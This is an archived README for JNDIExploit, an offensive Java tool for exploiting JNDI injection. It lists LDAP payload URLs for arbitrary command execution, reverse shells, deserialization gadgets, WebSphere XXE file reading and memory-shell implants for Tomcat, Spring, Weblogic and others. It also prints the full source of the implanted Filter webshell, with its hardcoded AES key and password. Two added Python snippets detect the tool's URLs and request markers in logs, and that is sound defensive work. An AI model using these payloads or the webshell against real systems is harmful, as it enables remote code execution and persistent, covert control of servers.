  • Stars: 266
  • Rank 153,275 (Top 4 %)
  • Language: Java
  • Created almost 3 years ago
  • Updated almost 3 years ago


Repository Details

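A tool for exploiting JNDI injection. It draws heavily on, and reuses code from, the Rogue JNDI project, supports implanting memory shells directly, integrates the common techniques for bypassing the restrictions in newer JDK versions, and is suited to use alongside automated tools. (from https://github.com/feihong-cs/JNDIExploit)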

December 13, 2021, 03:01

https://web.archive.org/web/20211213030144/https://github.com/feihong-cs/JNDIExploit/

JNDIExploit.v1.2.zip release download here or from web.archive.org ↑

JNDIExploit

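A tool for exploiting JNDI injection. It draws heavily on, and reuses code from, the Rogue JNDI project, supports implanting memory shells directly, integrates the common techniques for bypassing the restrictions in newer JDK versions, and is suited to use alongside automated tools.

Usage

Run java -jar JNDIExploit.jar -h to see the parameter descriptions; the --ip parameter is required.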

Usage: java -jar JNDIExploit.jar [options]
  Options:
  * -i, --ip       Local ip address
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8080)
    -u, --usage    Show usage (default: false)
    -h, --help     Show this help

Dockerfile

git clone https://github.com/feihong-cs/JNDIExploit.git
cd ./JNDIExploit
docker build -t jndiexploit .
docker run -it \
    -p 1389:1389 \
    -e LDAP_PORT=1389 \
    -p 80:80 \
    -e HTTP_PORT=80 \
    jndiexploit

Run java -jar JNDIExploit.jar -u to see the supported LDAP formats.

Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server

[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
    ldap://127.0.0.1:1389/Basic/Command/[cmd]
    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Basic/TomcatEcho
    ldap://127.0.0.1:1389/Basic/SpringEcho
    ldap://127.0.0.1:1389/Basic/WeblogicEcho
    ldap://127.0.0.1:1389/Basic/TomcatMemshell1
    ldap://127.0.0.1:1389/Basic/TomcatMemshell2  ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/Basic/JettyMemshell
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
    ldap://127.0.0.1:1389/Basic/JBossMemshell
    ldap://127.0.0.1:1389/Basic/WebsphereMemshell
    ldap://127.0.0.1:1389/Basic/SpringMemshell

[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
    ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
    ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
    ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells

[+] TomcatBypass Queries
    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[+] GroovyBypass Queries
    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[+] WebsphereBypass Queries
    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
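  • All currently supported PayloadType values
    • Dnslog: generates a DNS request, for use together with a DNSLog platform; lightly adapted for both Linux and Windows
    • Command: executes a command; if the command contains special characters, it can be Base64-encoded for transport
    • ReverseShell: a reverse shell for Linux systems, provided for convenience
    • TomcatEcho: echoes command execution results when the middleware is Tomcat; the command to execute is passed by adding a custom header cmd: whoami
    • SpringEcho: echoes command execution results when the framework is SpringMVC/SpringBoot; the command to execute is passed by adding a custom header cmd: whoami
    • WeblogicEcho: echoes command execution results when the middleware is Weblogic; the command to execute is passed by adding a custom header cmd: whoami
    • TomcatMemshell1: implants a Tomcat memory shell; supports Behinder shell and Basic cmd shell
    • TomcatMemshell2: implants a Tomcat memory shell; supports Behinder shell and Basic cmd shell; requires the extra HTTP header Shell: true when used; this is the recommended method
    • SpringMemshell: implants a Spring memory shell; supports Behinder shell and Basic cmd shell
    • WeblogicMemshell1: implants a Weblogic memory shell; supports Behinder shell and Basic cmd shell
    • WeblogicMemshell2: implants a Weblogic memory shell; supports Behinder shell and Basic cmd shell; this is the recommended method
    • JettyMemshell: implants a Jetty memory shell; supports Behinder shell and Basic cmd shell
    • JBossMemshell: implants a JBoss memory shell; supports Behinder shell and Basic cmd shell
    • WebsphereMemshell: implants a Websphere memory shell; supports Behinder shell and Basic cmd shell
  • All currently supported GadgetType values
    • URLDNS
    • CommonsBeanutils1
    • CommonsBeanutils2
    • CommonsCollectionsK1
    • CommonsCollectionsK2
    • C3P0
    • Jdk7u21
    • Jre8u20
    • CVE_2020_2551
    • CVE_2020_2883
  • The 3 actions in WebsphereBypass:
    • list: uses XXE to view directories or file contents on the target server
    • upload: uses XXE and the jar protocol to upload a malicious jar to a temporary directory on the target server
    • rce: loads the jar already uploaded to the target server's temporary directory to achieve remote code execution (I could not reproduce this step locally; it throws java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed. If anyone has reproduced it successfully, please give me some pointers)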
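
For triage, the path grammar listed above can be used to recognise this tool's lookup URLs in request or application logs and to decode any Base64 command they carry. The following is an added example, not code from the JNDIExploit project; the names classify, scan and SAMPLE_LOG are hypothetical, and the sample lines are constructed.

```python
import base64
import re
from urllib.parse import unquote

# Route and PayloadType names are copied from the usage output above; the rest is assumed.
ROUTES = {"basic", "deserialization", "tomcatbypass", "groovybypass", "webspherebypass"}
PAYLOADS = {"dnslog", "command", "reverseshell", "tomcatecho", "springecho",
            "weblogicecho", "tomcatmemshell1", "tomcatmemshell2", "springmemshell",
            "weblogicmemshell1", "weblogicmemshell2", "jettymemshell",
            "jbossmemshell", "webspherememshell"}
LDAP_URL = re.compile(r"ldap://[^/\s\"'}]+/([^\s\"'}]+)", re.IGNORECASE)

def classify(path):
    """Split a lookup path into route / variant / payload / params; None if no route matches."""
    parts = unquote(path).strip("/").split("/")
    route = parts[0].lower()           # the tool matches words case-insensitively
    if route not in ROUTES:
        return None
    rest = parts[1:]
    info = {"route": route, "variant": None, "payload": None, "params": [], "decoded_cmd": None}
    if route in ("deserialization", "webspherebypass") and rest:
        info["variant"] = rest.pop(0)  # GadgetType, or the WebSphere action (List/Upload/RCE)
    if rest and rest[0].lower() in PAYLOADS:
        info["payload"] = rest.pop(0).lower()
    info["params"] = rest
    if info["payload"] == "command" and len(rest) >= 2 and rest[0].lower() == "base64":
        blob = "/".join(rest[1:])      # Base64 text may itself contain '/'
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
            info["decoded_cmd"] = raw.decode("utf-8", errors="replace")
        except ValueError:
            pass                       # malformed blob: keep the hit, leave it undecoded
    return info

def scan(lines):
    """Return (line_number, info) for every LDAP URL whose path fits the grammar."""
    found = ((n, classify(m.group(1))) for n, line in enumerate(lines, 1)
             for m in LDAP_URL.finditer(line))
    return [(n, info) for n, info in found if info]

# Constructed sample lines using documentation addresses, not taken from a real log.
SAMPLE_LOG = [
    '198.51.100.7 "GET /?q=ldap://192.0.2.10:1389/TomcatBypass/Command/Base64/d2hvYW1p HTTP/1.1" 200',
    '198.51.100.7 "GET /?q=LDAP://192.0.2.10:1389/deserialization/CommonsBeanutils2/TomcatEcho HTTP/1.1" 200',
    '203.0.113.5 "GET /dir?src=ldap://corp-dc.example:389/ou=people,dc=example HTTP/1.1" 200',
]
```

A legitimate directory lookup such as the third sample line does not match any route name and is ignored, which keeps the false-positive rate low on hosts that use LDAP normally.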

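Memory shell notes

  • The shell is installed by dynamically adding a Filter/Controller, and the added Filter is moved to the first position in the FilterChain
  • For memory shell compatibility test results, see the memshell project
  • The Basic cmd shell is accessed at /anything?type=basic&pass=[cmd]
  • Accessing the Behinder shell requires a modified Behinder client (see method 2 in the article "冰蝎改造之适配基于tomcat Filter的无文件webshell", "Modifying Behinder to work with a Tomcat Filter-based fileless webshell", and make the change yourself); requests must also carry the X-Options-Ai header, and the password is rebeyond

The implanted Filter code is as follows: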

public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("[+] Dynamic Filter says hello");
        String k;
        Cipher cipher;
        if (servletRequest.getParameter("type") != null && servletRequest.getParameter("type").equals("basic")) {
            k = servletRequest.getParameter("pass");
            if (k != null && !k.isEmpty()) {
                cipher = null;
                String[] cmds;
                if (File.separator.equals("/")) {
                    cmds = new String[]{"/bin/sh", "-c", k};
                } else {
                    cmds = new String[]{"cmd", "/C", k};
                }

                String result = (new Scanner(Runtime.getRuntime().exec(cmds).getInputStream())).useDelimiter("\\A").next();
                servletResponse.getWriter().println(result);
            }
        } else if (((HttpServletRequest)servletRequest).getHeader("X-Options-Ai") != null) {
            try {
                if (((HttpServletRequest)servletRequest).getMethod().equals("POST")) {
                    k = "e45e329feb5d925b";
                    ((HttpServletRequest)servletRequest).getSession().setAttribute("u", k);
                    cipher = Cipher.getInstance("AES");
                    cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute("u") + "").getBytes(), "AES"));
                    byte[] evilClassBytes = cipher.doFinal((new BASE64Decoder()).decodeBuffer(servletRequest.getReader().readLine()));
                    Class evilClass = (Class)this.myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke((Object)null, evilClassBytes, Thread.currentThread().getContextClassLoader());
                    Object evilObject = evilClass.newInstance();
                    Method targetMethod = evilClass.getDeclaredMethod("equals", ServletRequest.class, ServletResponse.class);
                    targetMethod.invoke(evilObject, servletRequest, servletResponse);
                }
            } catch (Exception var10) {
                var10.printStackTrace();
            }
        } else {
            filterChain.doFilter(servletRequest, servletResponse);
        }

    }
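
The request markers this filter and the payload list rely on (the type=basic and pass parameters, and the X-Options-Ai, Shell: true and cmd headers) can be hunted for in captured HTTP requests. The following is an added detection example, not code from the project; the function name, record layout and label strings are hypothetical, the sample records are constructed, and it assumes request headers and form bodies are being logged, which default access logs usually do not do.

```python
from urllib.parse import urlsplit, parse_qs

def memshell_indicators(req):
    """req: dict with 'url', 'headers' (dict) and optional 'body' (form-encoded string)."""
    # Header names are case-insensitive on the wire, so normalise before matching.
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    params = parse_qs(urlsplit(req["url"]).query, keep_blank_values=True)
    # getParameter() also reads form-encoded bodies, so a POST can carry type/pass
    # without either appearing in the URL that an access log records.
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        for key, values in parse_qs(req.get("body", ""), keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    hits = []
    # Mirror the filter: first 'type' value equals "basic" and first 'pass' is non-empty.
    if params.get("type", [""])[0] == "basic" and params.get("pass", [""])[0]:
        hits.append("basic-cmd-shell")
    # The filter consumes any request carrying this header, whatever the method.
    if "x-options-ai" in headers:
        hits.append("behinder-header")
    # Value compared leniently; the page only documents the form "Shell: true".
    if headers.get("shell", "").strip().lower() == "true":
        hits.append("tomcatmemshell2-header")
    if "cmd" in headers:
        hits.append("echo-cmd-header")
    return hits

# Constructed sample requests for illustration only.
SAMPLE_REQUESTS = [
    {"url": "/index.jsp?type=basic&pass=whoami", "headers": {"Host": "app.example"}},
    {"url": "/login", "body": "type=basic&pass=whoami",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"}},
    {"url": "/api", "body": "AAAA", "headers": {"X-Options-Ai": "1"}},
    {"url": "/", "headers": {"Shell": "true", "cmd": "whoami"}},
    {"url": "/search?type=basic", "headers": {}},
]
```

Because the implanted Filter sits first in the FilterChain, these requests return a response on any path, so a hit on a URL that normally answers 404 or redirects to a login page deserves extra attention.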

References
